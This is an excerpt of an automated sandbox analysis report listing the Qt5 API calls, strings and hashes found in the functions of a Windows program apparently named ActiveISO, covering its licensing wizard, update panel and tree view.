                                                                                                                  • String ID: 1showHelp()$2helpRequested()$:/images/logo.png$:images/logo.png$Registration & Licensing
                                                                                                                  • API String ID: 3360980189-404347141
                                                                                                                  • Opcode ID: c7e39e2df143808956411e9fe05912ab558e535233a9e551e4691956abc8bbfc
                                                                                                                  • Instruction ID: 23ac3aaa13d74ca42e7c23eb1c59c31b2df6547e92f1a75a2584e62901d76fe7
                                                                                                                  • Opcode Fuzzy Hash: c7e39e2df143808956411e9fe05912ab558e535233a9e551e4691956abc8bbfc
                                                                                                                  • Instruction Fuzzy Hash: 45C16122F29A019AFB009BA1D8562AD2362FF85F95F454035DD0EB7B68DF3CD509C384
                                                                                                                  APIs
                                                                                                                  • ??0QWizard@@QEAA@PEAVQWidget@@V?$QFlags@W4WindowType@Qt@@@@@Z.QT5WIDGETS ref: 00007FF65374934C
                                                                                                                    • Part of subcall function 00007FF653769FB8: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,FFFFFFFF,00007FF65371257E), ref: 00007FF653769FD2
                                                                                                                  • ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FF653749385
                                                                                                                    • Part of subcall function 00007FF65374D790: ??0QWizardPage@@QEAA@PEAVQWidget@@@Z.QT5WIDGETS ref: 00007FF65374D7D0
                                                                                                                    • Part of subcall function 00007FF65374D790: ??0QChar@@QEAA@UQLatin1Char@@@Z.QT5CORE ref: 00007FF65374D818
                                                                                                                    • Part of subcall function 00007FF65374D790: ?arg@QString@@QEBA?AV1@AEBV1@HVQChar@@@Z.QT5CORE ref: 00007FF65374D833
                                                                                                                    • Part of subcall function 00007FF65374D790: ??0QChar@@QEAA@UQLatin1Char@@@Z.QT5CORE ref: 00007FF65374D842
                                                                                                                    • Part of subcall function 00007FF65374D790: ?arg@QString@@QEBA?AV1@AEBV1@HVQChar@@@Z.QT5CORE ref: 00007FF65374D85D
                                                                                                                    • Part of subcall function 00007FF65374D790: ?setTitle@QWizardPage@@QEAAXAEBVQString@@@Z.QT5WIDGETS ref: 00007FF65374D86A
                                                                                                                    • Part of subcall function 00007FF65374D790: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF65374D875
                                                                                                                    • Part of subcall function 00007FF65374D790: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF65374D880
                                                                                                                    • Part of subcall function 00007FF65374D790: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF65374D88B
                                                                                                                    • Part of subcall function 00007FF65374D790: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF65374D896
                                                                                                                    • Part of subcall function 00007FF65374D790: ?setSubTitle@QWizardPage@@QEAAXAEBVQString@@@Z.QT5WIDGETS ref: 00007FF65374D8BA
                                                                                                                    • Part of subcall function 00007FF65374D790: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF65374D8C5
                                                                                                                    • Part of subcall function 00007FF65374D790: ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF65374D8D7
                                                                                                                    • Part of subcall function 00007FF65374D790: ??0QPixmap@@QEAA@AEBVQString@@PEBDV?$QFlags@W4ImageConversionFlag@Qt@@@@@Z.QT5GUI ref: 00007FF65374D8EF
                                                                                                                    • Part of subcall function 00007FF65374D790: ?setPixmap@QWizardPage@@QEAAXW4WizardPixmap@QWizard@@AEBVQPixmap@@@Z.QT5WIDGETS ref: 00007FF65374D8FE
                                                                                                                  • ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FF6537493BE
                                                                                                                  • ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FF6537493F7
                                                                                                                  • ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FF653749430
                                                                                                                  • ?connect@QObject@@SA?AVConnection@QMetaObject@@PEBV1@PEBD01W4ConnectionType@Qt@@@Z.QT5CORE ref: 00007FF653749470
                                                                                                                  • ??1Connection@QMetaObject@@QEAA@XZ.QT5CORE ref: 00007FF65374947A
                                                                                                                  • ?connect@QObject@@SA?AVConnection@QMetaObject@@PEBV1@PEBD01W4ConnectionType@Qt@@@Z.QT5CORE ref: 00007FF6537494A5
                                                                                                                  • ??1Connection@QMetaObject@@QEAA@XZ.QT5CORE ref: 00007FF6537494AF
                                                                                                                  • ?connect@QObject@@SA?AVConnection@QMetaObject@@PEBV1@PEBD01W4ConnectionType@Qt@@@Z.QT5CORE ref: 00007FF6537494DA
                                                                                                                  • ??1Connection@QMetaObject@@QEAA@XZ.QT5CORE ref: 00007FF6537494E4
                                                                                                                  • ?connect@QObject@@SA?AVConnection@QMetaObject@@PEBV1@PEBD01W4ConnectionType@Qt@@@Z.QT5CORE ref: 00007FF65374950F
                                                                                                                  • ??1Connection@QMetaObject@@QEAA@XZ.QT5CORE ref: 00007FF653749519
                                                                                                                  • ?setPage@QWizard@@QEAAXHPEAVQWizardPage@@@Z.QT5WIDGETS ref: 00007FF653749527
                                                                                                                  • ?setPage@QWizard@@QEAAXHPEAVQWizardPage@@@Z.QT5WIDGETS ref: 00007FF653749538
                                                                                                                  • ?setPage@QWizard@@QEAAXHPEAVQWizardPage@@@Z.QT5WIDGETS ref: 00007FF653749549
                                                                                                                  • ?setPage@QWizard@@QEAAXHPEAVQWizardPage@@@Z.QT5WIDGETS ref: 00007FF65374955A
                                                                                                                  • ?setStartId@QWizard@@QEAAXH@Z.QT5WIDGETS ref: 00007FF653749566
                                                                                                                  • ?setOption@QWizard@@QEAAXW4WizardOption@1@_N@Z.QT5WIDGETS ref: 00007FF653749577
                                                                                                                  • ?setOption@QWizard@@QEAAXW4WizardOption@1@_N@Z.QT5WIDGETS ref: 00007FF653749588
                                                                                                                  • ?setOption@QWizard@@QEAAXW4WizardOption@1@_N@Z.QT5WIDGETS ref: 00007FF653749599
                                                                                                                  • ?setOption@QWizard@@QEAAXW4WizardOption@1@_N@Z.QT5WIDGETS ref: 00007FF6537495AA
                                                                                                                  • ?setOption@QWizard@@QEAAXW4WizardOption@1@_N@Z.QT5WIDGETS ref: 00007FF6537495BB
                                                                                                                  • ?setOption@QWizard@@QEAAXW4WizardOption@1@_N@Z.QT5WIDGETS ref: 00007FF6537495CC
                                                                                                                  • ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF6537495DE
                                                                                                                  • ??0QIcon@@QEAA@AEBVQString@@@Z.QT5GUI ref: 00007FF6537495F0
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF6537495FB
                                                                                                                  • ?setWindowIcon@QWidget@@QEAAXAEBVQIcon@@@Z.QT5WIDGETS ref: 00007FF653749608
                                                                                                                  • ?setWizardStyle@QWizard@@QEAAXW4WizardStyle@1@@Z.QT5WIDGETS ref: 00007FF653749616
                                                                                                                  • ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF653749628
                                                                                                                  • ??0QPixmap@@QEAA@AEBVQString@@PEBDV?$QFlags@W4ImageConversionFlag@Qt@@@@@Z.QT5GUI ref: 00007FF653749640
                                                                                                                  • ?setPixmap@QWizard@@QEAAXW4WizardPixmap@1@AEBVQPixmap@@@Z.QT5WIDGETS ref: 00007FF653749652
                                                                                                                  • ??1QPixmap@@UEAA@XZ.QT5GUI ref: 00007FF65374965D
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653749668
                                                                                                                    • Part of subcall function 00007FF653749880: ?tr@QMetaObject@@QEBA?AVQString@@PEBD0H@Z.QT5CORE(?,?,?,?,?,?,?,00000000,00007FF653749685), ref: 00007FF6537498A6
                                                                                                                    • Part of subcall function 00007FF653722A90: ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FF653722AAD
                                                                                                                    • Part of subcall function 00007FF653722A90: ?fromUtf8@QString@@SA?AV1@PEBDH@Z.QT5CORE ref: 00007FF653722AC9
                                                                                                                    • Part of subcall function 00007FF653722A90: ?append@QString@@QEAAAEAV1@AEBV1@@Z.QT5CORE ref: 00007FF653722AD6
                                                                                                                    • Part of subcall function 00007FF653722A90: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653722AE2
                                                                                                                    • Part of subcall function 00007FF65371F860: ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FF65371F87D
                                                                                                                    • Part of subcall function 00007FF65371F860: ?append@QString@@QEAAAEAV1@AEBV1@@Z.QT5CORE ref: 00007FF65371F891
                                                                                                                  • ?setWindowTitle@QWidget@@QEAAXAEBVQString@@@Z.QT5WIDGETS ref: 00007FF6537496B2
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF6537496BD
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF6537496C8
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF6537496D3
                                                                                                                  • ?connect@QObject@@SA?AVConnection@QMetaObject@@PEBV1@PEBD01W4ConnectionType@Qt@@@Z.QT5CORE ref: 00007FF6537496FE
                                                                                                                  • ??1Connection@QMetaObject@@QEAA@XZ.QT5CORE ref: 00007FF653749708
                                                                                                                  • ??1QIcon@@QEAA@XZ.QT5GUI ref: 00007FF653749713
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF65374971D
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String@@$?setWizard$Object@@$Wizard@@$Meta$Connection@$Array@@ByteOption@Option@1@_Type@V0@@$?connect@ConnectionQt@@@$?fromChar@@@Page@Page@@Page@@@String@@@$ArrayAscii_helper@Data@Flags@Pixmap@Pixmap@@Qt@@@@@Title@TypedWidget@@Window$?append@?arg@Char@@ConversionFlag@Icon@@ImageLatin1Pixmap@@@V1@@$?tr@Icon@Icon@@@Pixmap@1@StartStyle@Style@1@@Utf8@Widget@@@malloc
                                                                                                                  • String ID: 1RollbackTo(int)$1UpdateComplete(QString)$1UpdateComplete(QString)$1setUpdateTo(int)$1showHelp()$2NewVersionExists(int)$2Rollback(int)$2RollbackComplete(QString)$2UpdateComplete(QString)$2helpRequested()$:/images/logo.png$:images/logo.png$Updates
                                                                                                                  • API String ID: 3430951158-3168929579
                                                                                                                  • Opcode ID: a86f5e892367f9044b4a702017dc5a3e31be42d2e9ef63b19a89147a256ae9dd
                                                                                                                  • Instruction ID: d166dbde0311b8c1f430aee154d021863707948c170732f69e100512853f5cc7
                                                                                                                  • Opcode Fuzzy Hash: a86f5e892367f9044b4a702017dc5a3e31be42d2e9ef63b19a89147a256ae9dd
                                                                                                                  • Instruction Fuzzy Hash: 9FB13E21F29A4296FB109BA1E8562B92362EF89F95F480035DD0EF7BA4DF3CD509C344
                                                                                                                  APIs
                                                                                                                  • ??0QWidget@@QEAA@PEAV0@V?$QFlags@W4WindowType@Qt@@@@@Z.QT5WIDGETS ref: 00007FF65373C66B
                                                                                                                  • ?sharedNull@QArrayData@@SAPEAU1@XZ.QT5CORE ref: 00007FF65373C687
                                                                                                                    • Part of subcall function 00007FF65373D0B0: ?objectName@QObject@@QEBA?AVQString@@XZ.QT5CORE ref: 00007FF65373D0D4
                                                                                                                    • Part of subcall function 00007FF65373D0B0: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF65373D0E5
                                                                                                                    • Part of subcall function 00007FF65373D0B0: ?fromUtf8@QString@@SA?AV1@PEBDH@Z.QT5CORE ref: 00007FF65373D0FE
                                                                                                                    • Part of subcall function 00007FF65373D0B0: ?setObjectName@QObject@@QEAAXAEBVQString@@@Z.QT5CORE ref: 00007FF65373D10B
                                                                                                                    • Part of subcall function 00007FF65373D0B0: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF65373D116
                                                                                                                    • Part of subcall function 00007FF65373D0B0: ?resize@QWidget@@QEAAXHH@Z.QT5WIDGETS ref: 00007FF65373D12A
                                                                                                                    • Part of subcall function 00007FF65373D0B0: ?setContextMenuPolicy@QWidget@@QEAAXW4ContextMenuPolicy@Qt@@@Z.QT5WIDGETS ref: 00007FF65373D138
                                                                                                                    • Part of subcall function 00007FF65373D0B0: ??0QVBoxLayout@@QEAA@PEAVQWidget@@@Z.QT5WIDGETS ref: 00007FF65373D155
                                                                                                                    • Part of subcall function 00007FF65373D0B0: ?setSpacing@QBoxLayout@@QEAAXH@Z.QT5WIDGETS ref: 00007FF65373D17C
                                                                                                                    • Part of subcall function 00007FF65373D0B0: ?setContentsMargins@QLayout@@QEAAXHHHH@Z.QT5WIDGETS ref: 00007FF65373D196
                                                                                                                    • Part of subcall function 00007FF65373D0B0: ?fromUtf8@QString@@SA?AV1@PEBDH@Z.QT5CORE ref: 00007FF65373D1AD
                                                                                                                    • Part of subcall function 00007FF65373D0B0: ?setObjectName@QObject@@QEAAXAEBVQString@@@Z.QT5CORE ref: 00007FF65373D1BB
                                                                                                                    • Part of subcall function 00007FF65373D0B0: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF65373D1C6
                                                                                                                    • Part of subcall function 00007FF65373D0B0: ??0QGroupBox@@QEAA@PEAVQWidget@@@Z.QT5WIDGETS ref: 00007FF65373D1E3
                                                                                                                    • Part of subcall function 00007FF65373D0B0: ?fromUtf8@QString@@SA?AV1@PEBDH@Z.QT5CORE ref: 00007FF65373D214
                                                                                                                    • Part of subcall function 00007FF65373D0B0: ?setObjectName@QObject@@QEAAXAEBVQString@@@Z.QT5CORE ref: 00007FF65373D223
                                                                                                                    • Part of subcall function 00007FF65373D0B0: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF65373D22E
                                                                                                                    • Part of subcall function 00007FF65373D0B0: ??0QSize@@QEAA@HH@Z.QT5CORE ref: 00007FF65373D23E
                                                                                                                    • Part of subcall function 00007FF653769FB8: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,FFFFFFFF,00007FF65371257E), ref: 00007FF653769FD2
                                                                                                                    • Part of subcall function 00007FF653736010: ??0QTreeWidget@@QEAA@PEAVQWidget@@@Z.QT5WIDGETS ref: 00007FF653736022
                                                                                                                    • Part of subcall function 00007FF653736010: ?fromUtf8@QString@@SA?AV1@PEBDH@Z.QT5CORE ref: 00007FF65373605B
                                                                                                                    • Part of subcall function 00007FF653736010: ??0QIcon@@QEAA@AEBVQString@@@Z.QT5GUI ref: 00007FF65373606A
                                                                                                                    • Part of subcall function 00007FF653736010: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653736076
                                                                                                                    • Part of subcall function 00007FF653736010: ??0QTreeWidgetItem@@QEAA@PEAVQTreeWidget@@H@Z.QT5WIDGETS ref: 00007FF653736097
                                                                                                                    • Part of subcall function 00007FF653736010: ?setIcon@QTreeWidgetItem@@QEAAXHAEBVQIcon@@@Z.QT5WIDGETS ref: 00007FF6537360B1
                                                                                                                    • Part of subcall function 00007FF653736010: ?objectName@QObject@@QEBA?AVQString@@XZ.QT5CORE ref: 00007FF6537360BF
                                                                                                                    • Part of subcall function 00007FF653736010: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF6537360D0
                                                                                                                    • Part of subcall function 00007FF653736010: ?fromUtf8@QString@@SA?AV1@PEBDH@Z.QT5CORE ref: 00007FF6537360EA
                                                                                                                    • Part of subcall function 00007FF653736010: ?setObjectName@QObject@@QEAAXAEBVQString@@@Z.QT5CORE ref: 00007FF6537360F7
                                                                                                                    • Part of subcall function 00007FF653736010: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653736103
                                                                                                                    • Part of subcall function 00007FF653736010: ?resize@QWidget@@QEAAXHH@Z.QT5WIDGETS ref: 00007FF653736115
                                                                                                                    • Part of subcall function 00007FF653736010: ?setContextMenuPolicy@QWidget@@QEAAXW4ContextMenuPolicy@Qt@@@Z.QT5WIDGETS ref: 00007FF653736123
                                                                                                                    • Part of subcall function 00007FF653736010: ?setAcceptDrops@QWidget@@QEAAX_N@Z.QT5WIDGETS ref: 00007FF65373612E
                                                                                                                    • Part of subcall function 00007FF653736010: ?setDragDropMode@QAbstractItemView@@QEAAXW4DragDropMode@1@@Z.QT5WIDGETS ref: 00007FF65373613C
                                                                                                                    • Part of subcall function 00007FF653736010: ?setSelectionMode@QAbstractItemView@@QEAAXW4SelectionMode@1@@Z.QT5WIDGETS ref: 00007FF65373614A
                                                                                                                    • Part of subcall function 00007FF653736010: ?setAllColumnsShowFocus@QTreeView@@QEAAX_N@Z.QT5WIDGETS ref: 00007FF653736155
                                                                                                                    • Part of subcall function 00007FF653736010: ?header@QTreeView@@QEBAPEAVQHeaderView@@XZ.QT5WIDGETS ref: 00007FF65373615E
                                                                                                                    • Part of subcall function 00007FF653736010: ?objectName@QObject@@QEBA?AVQString@@XZ.QT5CORE ref: 00007FF65373616C
                                                                                                                    • Part of subcall function 00007FF653736010: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF65373617D
                                                                                                                    • Part of subcall function 00007FF653736010: ?connectSlotsByName@QMetaObject@@SAXPEAVQObject@@@Z.QT5CORE ref: 00007FF653736196
                                                                                                                    • Part of subcall function 00007FF653736010: ??1QIcon@@QEAA@XZ.QT5GUI ref: 00007FF6537361A2
                                                                                                                  • ?insertWidget@QBoxLayout@@QEAAXHPEAVQWidget@@HV?$QFlags@W4AlignmentFlag@Qt@@@@@Z.QT5WIDGETS ref: 00007FF65373C6D1
                                                                                                                  • ?header@QTreeView@@QEBAPEAVQHeaderView@@XZ.QT5WIDGETS ref: 00007FF65373C6DE
                                                                                                                  • ?connect@QObject@@SA?AVConnection@QMetaObject@@PEBV1@PEBD01W4ConnectionType@Qt@@@Z.QT5CORE ref: 00007FF65373C706
                                                                                                                  • ??1Connection@QMetaObject@@QEAA@XZ.QT5CORE ref: 00007FF65373C710
                                                                                                                  • ?connect@QObject@@SA?AVConnection@QMetaObject@@PEBV1@PEBD01W4ConnectionType@Qt@@@Z.QT5CORE ref: 00007FF65373C73C
                                                                                                                  • ??1Connection@QMetaObject@@QEAA@XZ.QT5CORE ref: 00007FF65373C746
                                                                                                                  • ?header@QTreeView@@QEBAPEAVQHeaderView@@XZ.QT5WIDGETS ref: 00007FF65373C753
                                                                                                                  • ?setSectionsMovable@QHeaderView@@QEAAX_N@Z.QT5WIDGETS ref: 00007FF65373C75E
                                                                                                                  • ?hideColumn@QTreeView@@QEAAXH@Z.QT5WIDGETS ref: 00007FF65373C76F
                                                                                                                  • ?hideColumn@QTreeView@@QEAAXH@Z.QT5WIDGETS ref: 00007FF65373C780
                                                                                                                  • ?hideColumn@QTreeView@@QEAAXH@Z.QT5WIDGETS ref: 00007FF65373C791
                                                                                                                  • ?hideColumn@QTreeView@@QEAAXH@Z.QT5WIDGETS ref: 00007FF65373C7A2
                                                                                                                  • ?hideColumn@QTreeView@@QEAAXH@Z.QT5WIDGETS ref: 00007FF65373C7B3
                                                                                                                  • ?hideColumn@QTreeView@@QEAAXH@Z.QT5WIDGETS ref: 00007FF65373C7C4
                                                                                                                  • ?hideColumn@QTreeView@@QEAAXH@Z.QT5WIDGETS ref: 00007FF65373C7D5
                                                                                                                  • ?hideColumn@QTreeView@@QEAAXH@Z.QT5WIDGETS ref: 00007FF65373C7E6
                                                                                                                  • ?setColumnWidth@QTreeView@@QEAAXHH@Z.QT5WIDGETS ref: 00007FF65373C7FB
                                                                                                                  • ?setColumnWidth@QTreeView@@QEAAXHH@Z.QT5WIDGETS ref: 00007FF65373C810
                                                                                                                    • Part of subcall function 00007FF6537147A0: ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,00000001,00007FF65371453F), ref: 00007FF653714A5D
                                                                                                                    • Part of subcall function 00007FF6537147A0: ?deallocate@QArrayData@@SAXPEAU1@_K1@Z.QT5CORE(?,?,?,?,?,?,00000001,00007FF65371453F), ref: 00007FF653714A74
                                                                                                                  • ?topLevelItem@QTreeWidget@@QEBAPEAVQTreeWidgetItem@@H@Z.QT5WIDGETS ref: 00007FF65373C84B
                                                                                                                  • ??0QVariant@@QEAA@H@Z.QT5CORE ref: 00007FF65373C85D
                                                                                                                  • ??1QVariant@@QEAA@XZ.QT5CORE ref: 00007FF65373C87F
                                                                                                                    • Part of subcall function 00007FF65373B500: ??0QString@@QEAA@XZ.QT5CORE ref: 00007FF65373B51D
                                                                                                                    • Part of subcall function 00007FF65373B500: ?sprintf@QString@@QEAAAEAV1@PEBDZZ.QT5CORE ref: 00007FF65373B553
                                                                                                                  • ?setText@QTreeWidgetItem@@QEAAXHAEBVQString@@@Z.QT5WIDGETS ref: 00007FF65373C89B
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF65373C8A6
                                                                                                                  • ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF65373C8B7
                                                                                                                  • ?setText@QTreeWidgetItem@@QEAAXHAEBVQString@@@Z.QT5WIDGETS ref: 00007FF65373C8CC
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF65373C8D7
                                                                                                                  • ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF65373C8E8
                                                                                                                  • ?setText@QTreeWidgetItem@@QEAAXHAEBVQString@@@Z.QT5WIDGETS ref: 00007FF65373C8FD
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF65373C908
                                                                                                                  • ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF65373C919
                                                                                                                  • ?setText@QTreeWidgetItem@@QEAAXHAEBVQString@@@Z.QT5WIDGETS ref: 00007FF65373C92E
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF65373C939
                                                                                                                  • ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF65373C94A
                                                                                                                  • ?setText@QTreeWidgetItem@@QEAAXHAEBVQString@@@Z.QT5WIDGETS ref: 00007FF65373C95F
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF65373C96A
                                                                                                                  • ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF65373C97B
                                                                                                                  • ?setText@QTreeWidgetItem@@QEAAXHAEBVQString@@@Z.QT5WIDGETS ref: 00007FF65373C990
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF65373C99B
                                                                                                                  • ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF65373C9AC
                                                                                                                  • ?currentDateTime@QDateTime@@SA?AV1@XZ.QT5CORE ref: 00007FF65373C9BA
                                                                                                                  • ?toString@QDateTime@@QEBA?AVQString@@AEBV2@@Z.QT5CORE ref: 00007FF65373C9CC
                                                                                                                  • ?setText@QTreeWidgetItem@@QEAAXHAEBVQString@@@Z.QT5WIDGETS ref: 00007FF65373C9DD
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF65373C9E8
                                                                                                                  • ??1QDateTime@@QEAA@XZ.QT5CORE ref: 00007FF65373C9F3
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF65373C9FE
                                                                                                                  • ?setItemExpanded@QTreeWidget@@QEAAXPEBVQTreeWidgetItem@@_N@Z.QT5WIDGETS ref: 00007FF65373CA13
                                                                                                                  • ?setCurrentItem@QTreeWidget@@QEAAXPEAVQTreeWidgetItem@@@Z.QT5WIDGETS ref: 00007FF65373CA23
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String@@$Tree$?set$View@@$Object@@$String@@@WidgetWidget@@$?from$Item@@$?hideArrayColumn@Name@$Text@$Ascii_helper@Data@Typed$MetaUtf8@$Connection@ContextDateHeaderLayout@@MenuObjectPolicy@Qt@@@$?header@?objectItemTime@@Type@Widget@@@$?connect@?resize@AbstractColumnConnectionData@@DragDropFlags@Icon@@Item@Mode@Mode@1@@Qt@@@@@SelectionVariant@@Width@$?connect?current?deallocate@?insert?shared?sprintf@?topAcceptAlignmentBox@@ColumnsContentsCurrentDrops@Expanded@Flag@Focus@GroupIcon@Icon@@@Item@@@Item@@_LevelMargins@Movable@Null@Object@@@SectionsShowSize@@SlotsSpacing@String@Time@U1@_V2@@Widget@Windowmalloc
                                                                                                                  • String ID: //Root$1openTreeContextMenu(QPoint)$1treeWidgetHeader_geometriesChanged(int, int, int)$2customContextMenuRequested(QPoint)$2sectionResized(int, int, int)$dd/MM/yy hh:mm:ss
                                                                                                                  • API String ID: 2822325586-396115925
                                                                                                                  • Opcode ID: df248f3df79c0d2a429efb490f05a36ee0e1da4e0975c9566cfe871e6786cfff
                                                                                                                  • Instruction ID: 85c156c06d76395efa1c4572db6fc3a121e5ff0ed07f591e5a8b6962bfe8d761
                                                                                                                  • Opcode Fuzzy Hash: df248f3df79c0d2a429efb490f05a36ee0e1da4e0975c9566cfe871e6786cfff
                                                                                                                  • Instruction Fuzzy Hash: 1CC14C32924A82D7EB14DF61E8856E93366FB85F49F458131CA4EB3624DF3CE909C384
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String@@$V0@@$?fromArrayAscii_helper@Data@Typed$?remove@ByteDevice@@File@@Lower@$CaseFileQt@@@Sensitivity@$?replace@Array@@End@String@@@V1@0$?close@?exists@?index?open@?read?resize@Array@@@Array@@_Device@@@@@Flag@Flags@Line@ModeOpen
                                                                                                                  • String ID: key$name$regkey$reguser
                                                                                                                  • API String ID: 2388637038-2666982028
                                                                                                                  • Opcode ID: 73153a1026f0590b6634139064d954a3b0594419fa465d22689af2003b7ed4ce
                                                                                                                  • Instruction ID: b6b5d0a01f724d4d9a1eac4dd85def12381c87e9c3e007ea6c64c10692ef769b
                                                                                                                  • Opcode Fuzzy Hash: 73153a1026f0590b6634139064d954a3b0594419fa465d22689af2003b7ed4ce
                                                                                                                  • Instruction Fuzzy Hash: 67C16161F14A42A6FB00DFA0D8961BC2372FB41FA9B484135D95EB76A4DF3CE50AC384
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
